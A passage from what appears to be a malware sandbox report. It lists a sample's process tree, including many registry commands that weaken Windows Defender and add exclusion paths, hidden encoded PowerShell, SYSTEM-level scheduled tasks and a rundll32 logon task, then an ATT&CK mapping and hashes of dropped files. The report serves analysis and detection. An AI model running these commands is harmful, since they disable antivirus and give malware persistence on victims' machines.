Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ARTXeDTAxvUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ARTXeDTAxvUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ByWuwrOBU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ByWuwrOBU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DUGaRsFaSnqjC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DUGaRsFaSnqjC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RVqmAwyyxwiU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RVqmAwyyxwiU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wGkeBUkfAIhWvVVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wGkeBUkfAIhWvVVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ofqvFcNvzeRditbz\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ofqvFcNvzeRditbz\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wGkeBUkfAIhWvVVB /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wGkeBUkfAIhWvVVB /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ofqvFcNvzeRditbz /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ofqvFcNvzeRditbz /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gaaDTOTVb" /SC once /ST 05:02:39 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gaaDTOTVb"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gaaDTOTVb"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "BAnwxolbGpCzXNxkj" /SC once /ST 00:20:33 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\ThLmWQp.exe\" XT /jxsite_idheZ 385118 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "BAnwxolbGpCzXNxkj"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\ThLmWQp.exeC:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\ThLmWQp.exe XT /jxsite_idheZ 385118 /S1⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bWycNackLSywaqkmgR"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ByWuwrOBU\jxxpuA.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "qbSDwEgyNYPZlGA" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
Network
MITRE ATT&CK Matrix ATT&CK v13
Persistence
Create or Modify System Process
2Windows Service
2Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Defense Evasion
Modify Registry
7Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
4Disable or Modify Tools
3Disable or Modify System Firewall
1Virtualization/Sandbox Evasion
1Subvert Trust Controls
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpiFilesize
2.0MB
MD5248e002843c10ce14fe1e6b2634f6cbb
SHA169af2eec47ed339c7a0c160c26e5d265bed231a4
SHA256ba2dea807dd865f2a4fd7ac757a53a30fe21e0d67e22b7110c27f7ea3c79bcb6
SHA5126a471b76500daa546240dc07a80ea1cdc8602f4b25bdcd034943edb40871936df56893104b86d3c37714359f426d44c61d15e6dc86baf6a6c554165341d2dda3
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
2KB
MD5a6ea7bfcd3aac150c0caef765cb52281
SHA1037dc22c46a0eb0b9ad4c74088129e387cffe96b
SHA256f019af2e5e74cdf13c963910500f9436c66b6f2901f5056d72f82310f20113b9
SHA512c8d2d373b48a26cf6eec1f5cfc05819011a3fc49d863820ad07b6442dd6d5f64e27022a9e4c381eb58bf7f6b19f8e77d508734ff803073ec2fb32da9081b6f23
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveFilesize
21KB
MD5dfc84b193a7705f2cc2f920b40f9b743
SHA1e53a279c0a4bf575e0ddfe33b3d057aa12e97f4b
SHA2568f701815a1696ef08d1d7080909897db477967127643fd49f44f20b08f6e20f3
SHA5120a1821f5ba167c69daa20e902b1e57aa35ef5973fda652bc6649817b6aeee164a272099b81cc650d1acc35afb26e32edc956ba17fb8fc7169e348e3fc21bf018
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404250836121\additional_file0.tmpFilesize
2.5MB
MD515d8c8f36cef095a67d156969ecdb896
SHA1a1435deb5866cd341c09e56b65cdda33620fcc95
SHA2561521c69f478e9ced2f64b8714b9e19724e747cd8166e0f7ab5db1151a523dda8
SHA512d6f48180d4dcb5ba83a9c0166870ac00ea67b615e749edf5994bc50277bf97ca87f582ac6f374c5351df252db73ee1231c943b53432dbb7563e12bbaf5bb393a
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404250836121\assistant\assistant_installer.exeFilesize
1.9MB
MD5976bc8e5fe65f9bb56831e20f1747150
SHA1f9e7f5628aaaabed9939ef055540e24590a9ccfb
SHA256f53c916ccf3d24d6793227283de2db0f6cc98a2275413851807cc080643d21a0
SHA5122858e7e08418b170b21b599afb02236d0480d35a5605de142f10976489e01daf2ad80df0f09c2eb38bc5a971336d1f6aa9909c520bcdb18e9c9a8e903379dcd9
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404250836121\assistant\dbgcore.dllFilesize
166KB
MD59ebb919b96f6f94e1be4cdc6913ef629
SHA131e99ac4fba516f82b36bd81784e8d518b32f9df
SHA256fdae21127deb16eb8ba36f2493d2255f4cb8ab4c18e8bd8ba5e587f5a7ecd119
SHA512a1b42f7d2896da270bb3c80cf9b88c4b4f1491084e7aa7760eeea5533b26f041dc79b21d5ffd2bba2221fe118e0a8d912e170f24fd895c9315b1ee9c7adfe700
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404250836121\assistant\dbghelp.dllFilesize
1.7MB
MD5544255258f9d45b4608ccfd27a4ed1dd
SHA1571e30ceb9c977817b5bbac306366ae59f773497
SHA2563b02fc85602e83059f611c658e3cad6bc59c3c51214d4fe7e31f3ac31388dd68
SHA5122093da881fa90eec2b90d1ca6eaaff608fe16ac612571a7fd5ed94dd5f7ff7e5c1e8c862bab0a228850829527886473e3942abd23a81d10cab8f9baad2cc7664
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404250836121\opera_packageFilesize
103.9MB
MD54936231c48634b100429f03ad2da9441
SHA1ad9d994173ceaf384ce808b12f7d10563ecd8a1d
SHA256c5b7fcc93b1ed8b24f3c7be9d736401f2ac8c5fcaa270092a58d735f5630f3a7
SHA51245c86456b42c64524729a2ad3f2b058eafff733200f376e7e346a84bea9b0e55641dbdb22a7c79622bad1b993a4b7b26e741f6848b61f84382b4e3e464407a66
-
C:\Users\Admin\AppData\Local\Temp\60df67cfFilesize
1.4MB
MD5aa36903e684baf378b7ea17e14f2c2f1
SHA1fec5d736754ce07948a8f76546e8becfa4a0430a
SHA2563325db7fe45d84bb703901a7d1bc892b76a1501911e97af1900502704c77f0ec
SHA512cb52a3404d65b8b0e74df96dd0b0a28c57c03575c94535875828d8603fdf1fdf2e392c365b81b16773bc20d8bafe5341d97f9d524540aafcb103b88d23dfe5f6
-
C:\Users\Admin\AppData\Local\Temp\7zS841A.tmp\Install.exeFilesize
6.8MB
MD5e77964e011d8880eae95422769249ca4
SHA18e15d7c4b7812a1da6c91738c7178adf0ff3200f
SHA256f200984380d291051fc4b342641cd34e7560cadf4af41b2e02b8778f14418f50
SHA5128feb3dc4432ec0a87416cbc75110d59efaf6504b4de43090fc90286bd37f98fc0a5fb12878bb33ac2f6cd83252e8dfd67dd96871b4a224199c1f595d33d4cade
-
C:\Users\Admin\AppData\Local\Temp\Opera_installer_2404250836119814260.dllFilesize
4.6MB
MD5cb9f8ac8c123de6ef018cd36e39d4a61
SHA130733f7b86743531636affc6e0394f9c3189b3d0
SHA256ea03fe24040a07d65144d51bc06535b2d5104cfc761934e8d2e6c12887f11481
SHA51211d4b2f2eb43258d26dbcb6e0f11a941685491e42eda38a3a628e31d278f346b559f7b407ab658163d01a7576e57a49462b156073c71d8eb6621bf25dbd7b1ae
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_whhosyv5.n4e.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeFilesize
281KB
MD5d98e33b66343e7c96158444127a117f6
SHA1bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA2565de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5
-
C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txtFilesize
2KB
MD5e3e2e65ee23eb19969e1dac07f713689
SHA1d53d31bab7872ea69f7da40fce370dc8aefcb2b2
SHA256832f1f7574f0c48d3ae149bb793c11c41a05eec176a52760e2c072fdf2a8f707
SHA512e21a381d3e9986c09a200be9edc5a717299d6ca562b0da80a31346dc003e1b3052da5413c0d461d9a87a8fb3b2d11559b1e93d0f91feaa16848c90a800c436ea
-
C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txtFilesize
3KB
MD5300fec430c8d96837168602c221b2bff
SHA10d7be24845c454fc7f811c2320baca75ca349c4a
SHA256cc9effb518958a96ca61bb6a2ec00fa56157fd7b680260dc2885acb65ddbea8a
SHA512b10505771c81db979a99c01624fa5f2f86effdf5033e9b2f09dab24c971c02d9ca3c4fadc60cf7271e0c6581ddd57547299d75195cdbbba0f729b18f93c11a0d
-
C:\Users\Admin\AppData\Local\Temp\tmp7210.tmpFilesize
20KB
MD542c395b8db48b6ce3d34c301d1eba9d5
SHA1b7cfa3de344814bec105391663c0df4a74310996
SHA2565644546ecefc6786c7be5b1a89e935e640963ccd34b130f21baab9370cb9055d
SHA5127b9214db96e9bec8745b4161a41c4c0520cdda9950f0cd3f12c7744227a25d639d07c0dd68b552cf1e032181c2e4f8297747f27bad6c7447b0f415a86bd82845
-
